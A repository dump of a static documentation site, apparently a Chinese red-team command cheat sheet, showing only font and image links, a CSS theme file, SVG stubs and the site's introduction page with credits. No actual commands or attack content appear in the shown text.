https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-59.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-6.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-6.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-60.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-60.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-61.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-61.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-62.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-62.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-63.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-63.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-64.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-64.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-65.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-65.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-66.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-66.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-67.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-67.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-68.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-68.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-69.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-69.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-70.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-70.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-71.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-71.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-72.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-72.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-73.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-73.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-74.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-74.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-75.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-75.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-76.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-76.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-77.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-77.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-78.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-78.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-79.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-79.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-80.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-80.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-81.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-81.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-82.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-82.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-83.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-83.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-84.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-84.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-85.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-85.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-86.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-86.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-87.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-87.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-88.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-88.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-89.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-89.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-90.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-90.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-91.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-91.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-97.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-97.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-98.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-98.woff2 -------------------------------------------------------------------------------- /site/css/lxfonts/lxgwwenkai-regular-subset-99.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/css/lxfonts/lxgwwenkai-regular-subset-99.woff2 -------------------------------------------------------------------------------- /site/css/theme.css: -------------------------------------------------------------------------------- 1 | body { 2 | display: block; 3 | margin: 0px; 4 | } 5 | 6 | pre { 7 | padding-bottom: 0.5em; 8 | font-size: 13px; 9 | } 10 | 11 | .codehilitetable tr { 12 | background-color: #272822; 13 | color: white; 14 | } 15 | 16 | .critic { 17 | padding: 0 0.25em; 18 | box-shadow: none; 19 | } 20 | 21 | ins.critic { 22 | background-color: var(--green-bright); 23 | } 24 | del.critic { 25 | background-color: var(--red); 26 | } 27 | .critic.comment { 28 | background-color: var(--blue-light); 29 | } 30 | 31 | /* Emojis */ 32 | .emojione, 33 | .twemoji { 34 | width: 1.125em; 35 | vertical-align: -15%; 36 | } 37 | 38 | h1 code, 39 | h2 code, 40 | h3 code, 41 | h4 code, 42 | h5 code, 43 | span code, 44 | table code, 45 | li code, 46 | blockquote code, 47 | p code { 48 | padding: 0.2em 0.4em; 49 | margin: 0; 50 | font-size: 85%; 51 | /* background-color: rgba(27, 31, 35, 0.05); */ 52 | border-radius: 6px; 53 | background-color: var(--inline-code-bg); 54 | border: var(--inline-code-border); 55 | } 56 | 57 | pre { 58 | overflow-x: auto; 59 | } 60 | /* Keyboard */ 61 | kbd { 62 | font-size: 0.85rem; 63 | border: 1px solid #aaa; 64 | border-radius: 4px; 65 | display: inline-block; 66 | padding: 5px 9px; 67 | background: linear-gradient(178deg, var(--grey-white), var(--grey-white), var(--grey-white), var(--grey-subtle)); 68 | } 69 | 70 | /* Admonition */ 71 | .admonition { 72 | background-color: var(--grey-white); 73 | margin-bottom: 15px; 74 | border-radius: 0.25rem; 75 | border: 2px solid var(--green-bright); 76 | } 77 | .admonition .admonition-title { 78 | background-color: var(--green-bright); 79 | } 80 | 81 | .admonition.highlight { 82 | padding: 0 10px; 83 | } 84 | 85 | .admonition p { 86 | background-color: var(--grey-white); 87 | margin: 0px !important; 88 | padding: 14px; 89 | } 90 | 91 | .admonition.note, 92 | .admonition.info, 93 | .admonition.tips { 94 | border: 2px solid var(--blue-light); 95 | } 96 | 97 | .admonition.note .admonition-title, 98 | .admonition.info .admonition-title, 99 | .admonition.tips .admonition-title { 100 | background-color: var(--blue-light); 101 | } 102 | 103 | .admonition.success, 104 | .admonition.check, 105 | .admonition.done { 106 | border: 2px solid var(--green-light); 107 | } 108 | 109 | .admonition.success .admonition-title, 110 | .admonition.check .admonition-title, 111 | .admonition.done .admonition-title { 112 | background-color: var(--green-light); 113 | } 114 | 115 | .admonition.warning, 116 | .admonition.warn, 117 | .admonition.caution, 118 | .admonition.attention, 119 | .admonition.important { 120 | border: 2px solid var(--orange-subtle); 121 | } 122 | 123 | .admonition.warning .admonition-title, 124 | .admonition.warn .admonition-title, 125 | .admonition.caution .admonition-title, 126 | .admonition.attention .admonition-title, 127 | .admonition.important .admonition-title { 128 | background-color: var(--orange-subtle); 129 | } 130 | 131 | .admonition.danger, 132 | .admonition.critical, 133 | .admonition.failure, 134 | .admonition.fail, 135 | .admonition.missing { 136 | border: 2px solid var(--red); 137 | } 138 | 139 | .admonition.danger .admonition-title, 140 | .admonition.critical .admonition-title, 141 | .admonition.failure .admonition-title, 142 | .admonition.fail .admonition-title, 143 | .admonition.missing .admonition-title { 144 | background-color: var(--red); 145 | } 146 | 147 | /* Repo link */ 148 | .repo-link image, 149 | .repo-link img { 150 | filter: invert(var(--repo-link-invert)) sepia(0%) saturate(2574%) hue-rotate(155deg) 151 | brightness(113%) contrast(77%); 152 | } 153 | 154 | 155 | .repo-link:after { 156 | background-color: inherit !important; 157 | } 158 | 159 | /* Secondary side-bar */ 160 | 161 | .sidebar--secondary { 162 | right: 0px; 163 | position: fixed; 164 | top: 100px; 165 | padding: 24px; 166 | height: 100%; 167 | overflow-y: auto; 168 | font-size: 0.9rem; 169 | border-left: 1px solid var(--grey-light-silver); 170 | background-color: var(--grey-white); 171 | } 172 | 173 | .sidebar--secondary .child-li { 174 | padding-left: 0.6rem; 175 | } 176 | 177 | .sidebar--secondary ul { 178 | list-style: none; 179 | margin: 0; 180 | padding: 0; 181 | margin-bottom: 24px; 182 | } 183 | .sidebar--secondary li { 184 | margin-bottom: 8px; 185 | } 186 | 187 | .kpn-style { 188 | min-height: 82vh; 189 | max-width: 850px; 190 | /* padding: 1rem; 191 | background-color: white; */ 192 | width: 100%; 193 | } 194 | .card { 195 | width: 100%; 196 | } 197 | table { 198 | display: block; 199 | overflow-x: auto; 200 | } 201 | .top-bar__item__version { 202 | display: none; 203 | } 204 | 205 | @media only screen and (min-width: 992px) { 206 | 207 | .side-bar .side-bar__sub-menu .side-bar__link { 208 | line-height: 1.5; 209 | padding-left: 25px; 210 | margin-top: .4em; 211 | } 212 | 213 | .side-bar__sub-menu.side-bar__sub-menu--visible { 214 | margin-left: calc(24px + 30px); 215 | border-color: var(--grey-silver); 216 | border-left-width: 1px; 217 | border-left-style: solid; 218 | } 219 | 220 | .top-bar__item__version { 221 | display: unset; 222 | } 223 | 224 | .sidebar--secondary { 225 | width: 170px; 226 | } 227 | 228 | .content-block { 229 | margin-right: 12.1rem; 230 | display: flex; 231 | justify-content: center; 232 | } 233 | 234 | .kpn-style { 235 | min-height: 76vh; 236 | max-width: 850px; 237 | /* 238 | background-color: white; */ 239 | } 240 | .card { 241 | width: inherit; 242 | padding: 1rem; 243 | } 244 | 245 | label[for="dark-mode"]:hover { 246 | filter: var(--dark-mode-label-filter-hover); 247 | } 248 | .repo-link:hover image, 249 | .repo-link:hover img { 250 | filter: invert(29%) sepia(85%) saturate(2054%) hue-rotate(95deg) 251 | brightness(99%) contrast(102%); 252 | } 253 | 254 | .repo-link { 255 | margin-left: 10px; 256 | } 257 | 258 | } 259 | 260 | @media only screen and (min-width: 1200px) { 261 | .sidebar--secondary { 262 | width: 280px; 263 | padding-left: 48px; 264 | } 265 | .content-block { 266 | margin-right: 24.2rem; 267 | } 268 | } 269 | 270 | /* Detail */ 271 | 272 | details { 273 | display: block; 274 | } 275 | 276 | details[open] > summary::before { 277 | content: "\25BC"; 278 | } 279 | 280 | details summary { 281 | display: block; 282 | cursor: pointer; 283 | } 284 | 285 | details summary:focus { 286 | outline: none; 287 | } 288 | 289 | details summary::before { 290 | content: "\25B6"; 291 | padding-right: 0.5em; 292 | } 293 | 294 | details summary::-webkit-details-marker { 295 | display: none; 296 | } 297 | 298 | /* Attach the "no-details" class to details tags 299 | in browsers that do not support them to get 300 | open/show functionality. */ 301 | details.no-details:not([open]) > * { 302 | display: none; 303 | } 304 | 305 | details.no-details:not([open]) summary { 306 | display: block; 307 | } 308 | 309 | .space-between { 310 | display: flex; 311 | justify-content: space-between; 312 | } 313 | 314 | .headerlink { 315 | text-decoration: none; 316 | visibility: hidden; 317 | color: #93939340; 318 | padding-left: 10px; 319 | opacity: 0; 320 | transition: visibility 1s, opacity 0.2s linear; 321 | } 322 | 323 | h1:hover .headerlink, 324 | h2:hover .headerlink, 325 | h3:hover .headerlink, 326 | h4:hover .headerlink { 327 | visibility: visible; 328 | color: #93939385; 329 | opacity: 1; 330 | } 331 | 332 | .content-block img { 333 | max-width: 100%; 334 | } 335 | 336 | h1::before, 337 | h2::before, 338 | h3::before, 339 | h4::before { 340 | display: block; 341 | content: " "; 342 | margin-top: -115px; 343 | padding-top: 115px; 344 | visibility: hidden; 345 | pointer-events: none; 346 | } 347 | 348 | #search-input-wrapper { 349 | align-items: center; 350 | display: flex; 351 | position: relative; 352 | height: inherit; 353 | } 354 | 355 | #search-input { 356 | margin: 0; 357 | } 358 | 359 | #search-input::placeholder { 360 | color: var(--grey-medium); 361 | } 362 | 363 | blockquote { 364 | margin: 15px 0 15px 0; 365 | padding: 0 1em; 366 | font-size: 13px; 367 | color: var(--grey-dark); 368 | border-left: 0.25em solid #dfe2e5; 369 | } 370 | 371 | /* blockquote p code { 372 | color: var(--grey-black); 373 | background-color: var(--grey-silver); 374 | } */ 375 | 376 | .tabbed-set { 377 | display: flex; 378 | position: relative; 379 | flex-wrap: wrap; 380 | /* margin-top: 30px; */ 381 | } 382 | 383 | .tabbed-set .tabbed-content { 384 | display: none; 385 | order: 99; 386 | width: 100%; 387 | border-top: 1px solid transparent; 388 | border-color: var(--grey-light); 389 | padding-top: 8px; 390 | z-index: 1; 391 | } 392 | 393 | .tabbed-set input { 394 | position: absolute; 395 | opacity: 0; 396 | } 397 | 398 | .tabbed-set label { 399 | padding: 16px 8px; 400 | margin-right: 16px; 401 | cursor: pointer; 402 | border-bottom: 2px solid transparent; 403 | line-height: 1; 404 | z-index: 10; 405 | } 406 | 407 | .tabbed-set input:nth-child(n + 1):checked + label { 408 | font-weight: 700; 409 | border-bottom: 2px solid transparent; 410 | border-color: var(--green); 411 | } 412 | 413 | .tabbed-set input:nth-child(n + 1):checked + label + .tabbed-content { 414 | display: block; 415 | } 416 | 417 | /* Dark mode styles */ 418 | 419 | #dark-mode { 420 | position: fixed; 421 | --transform-translate-x: 0; 422 | --transform-translate-y: 0; 423 | --transform-rotate: 0; 424 | --transform-skew-x: 0; 425 | --transform-skew-y: 0; 426 | --transform-scale-x: 1; 427 | --transform-scale-y: 1; 428 | transform: translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y)); 429 | --transform-scale-x: 0; 430 | --transform-scale-y: 0; 431 | } 432 | 433 | label[for="dark-mode"] { 434 | filter: var(--dark-mode-label-filter); 435 | } 436 | 437 | 438 | #label-dark-mode::after { 439 | outline: none; 440 | box-shadow: none; 441 | background-color: inherit; 442 | } 443 | 444 | .kpn-style code a { 445 | color:var(--blue); 446 | text-decoration: none; 447 | } 448 | 449 | .top-bar .top-bar__logo img { 450 | height: 32px; 451 | filter: var(--logo-filter); 452 | } 453 | 454 | .top-bar .top-bar__title { 455 | font-weight: 600; 456 | } 457 | 458 | .hljs { 459 | border-radius: 0.25rem; 460 | } 461 | 462 | .top-bar__version { 463 | color: var(--green); 464 | align-items: center; 465 | display: flex; 466 | height: inherit; 467 | padding-left: space(); 468 | padding-right: space(); 469 | margin-left: 10px; 470 | user-select: none; 471 | } 472 | 473 | .text-sm { 474 | font-size: 0.875rem; /* 12px */ 475 | line-height: 1.25rem; /* 16px */ 476 | } 477 | 478 | .side-bar__version { 479 | color: var(--grey-white); 480 | } 481 | 482 | .kpn-style ol ol:not([class]), 483 | .kpn-style ol ul:not([class]), 484 | .kpn-style ul ol:not([class]), 485 | .kpn-style ul ul:not([class]) { 486 | margin-bottom: 5px; 487 | margin-top: 5px; 488 | } 489 | 490 | .table, .kpn-style table:not([class]) { 491 | border-top: unset; 492 | } 493 | 494 | 495 | .kpn-style table:not([class]) thead { 496 | background-color: var(--grey); 497 | color: var(--green); 498 | } 499 | -------------------------------------------------------------------------------- /site/fonts/kpn-metric-bold.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-bold.eot -------------------------------------------------------------------------------- /site/fonts/kpn-metric-bold.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-bold.ttf -------------------------------------------------------------------------------- /site/fonts/kpn-metric-bold.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-bold.woff -------------------------------------------------------------------------------- /site/fonts/kpn-metric-light.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-light.eot -------------------------------------------------------------------------------- /site/fonts/kpn-metric-light.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-light.ttf -------------------------------------------------------------------------------- /site/fonts/kpn-metric-light.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-light.woff -------------------------------------------------------------------------------- /site/fonts/kpn-metric-normal.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-normal.eot -------------------------------------------------------------------------------- /site/fonts/kpn-metric-normal.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-normal.ttf -------------------------------------------------------------------------------- /site/fonts/kpn-metric-normal.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-normal.woff -------------------------------------------------------------------------------- /site/fonts/kpn-metric-semi-bold.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-semi-bold.eot -------------------------------------------------------------------------------- /site/fonts/kpn-metric-semi-bold.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-semi-bold.ttf -------------------------------------------------------------------------------- /site/fonts/kpn-metric-semi-bold.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-metric-semi-bold.woff -------------------------------------------------------------------------------- /site/fonts/kpn-service-icons.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-service-icons.eot -------------------------------------------------------------------------------- /site/fonts/kpn-service-icons.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-service-icons.ttf -------------------------------------------------------------------------------- /site/fonts/kpn-service-icons.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-service-icons.woff -------------------------------------------------------------------------------- /site/fonts/kpn-ui-icons.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-ui-icons.eot -------------------------------------------------------------------------------- /site/fonts/kpn-ui-icons.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-ui-icons.ttf -------------------------------------------------------------------------------- /site/fonts/kpn-ui-icons.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/fonts/kpn-ui-icons.woff -------------------------------------------------------------------------------- /site/img/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/img/favicon.ico -------------------------------------------------------------------------------- /site/img/git-icon-black.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/img/git-icon-black.png -------------------------------------------------------------------------------- /site/img/git.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 10 | 11 | -------------------------------------------------------------------------------- /site/img/logo-bitbucket.svg: -------------------------------------------------------------------------------- 1 | Bitbucket -------------------------------------------------------------------------------- /site/img/logo-gitea.svg: -------------------------------------------------------------------------------- 1 | Gitea -------------------------------------------------------------------------------- /site/img/logo-github.svg: -------------------------------------------------------------------------------- 1 | Logo Github -------------------------------------------------------------------------------- /site/img/logo-gitlab.svg: -------------------------------------------------------------------------------- 1 | Logo Gitlab -------------------------------------------------------------------------------- /site/img/logo-kpn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EdgeSecurityTeam/command/a24a0c755375f7d7af8227a8d69046d127da481f/site/img/logo-kpn.png -------------------------------------------------------------------------------- /site/img/logo-kpn.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /site/img/logo.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 9 | logo 10 | 12 | 25 | 30 | 37 | 46 | 53 | 58 | 61 | 63 | 64 | 67 | 74 | 75 | 82 | 91 | 96 | 103 | 108 | 123 | 124 | 125 | 126 | 128 | 130 | 132 | 133 | 134 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | -------------------------------------------------------------------------------- /site/img/ui-bulb.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | ui-bulb 4 | 5 | 6 | -------------------------------------------------------------------------------- /site/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 11 | 介绍 - 红队命令速查 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 37 | 38 | 39 | 40 | 41 | 42 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 56 | 57 |
58 | 59 |
60 | 61 | 113 | 114 | 123 | 286 | 287 | 288 |
289 |
290 |
介绍
291 |
292 | 293 | 309 | 310 |
311 |
312 |
313 |
314 | 315 | 316 |

介绍

317 |

红队命令速查 是由棱角社区(Edge Forum) 整理的关于 Red Team 期间所常使用的一些基础命令。

318 |
'''+ Edge Team +'''
319 | 
320 | 
321 |  __    _        __                        ___         
322 | |_  _|(_| _    (_  _  _     __ o _|_ \/    |  _  _ __ 
323 | |__(_|__|(/_   __)(/_(_ |_| |  |  |_ /     | (/_(_||||
324 | 
325 |

目录

326 | 345 |

感谢

346 |
347 |
348 |

以下排名不分先后!

349 |
350 |
    351 |
  • @loid
  • 352 |
  • @r0exper
  • 353 |
  • @路人甲
  • 354 |
  • @Upcorn
  • 355 |
  • @cxaqhq
  • 356 |
357 | 358 |
359 |
360 |
361 |
362 |
363 | 364 | 365 |
366 | 389 |
390 |
391 | 392 | 393 | 397 | 398 | 403 | 404 | 405 | 406 | 407 | 408 | 411 | 412 | 419 | 420 | 421 | 422 | 423 | 424 | 450 | 459 | 460 |
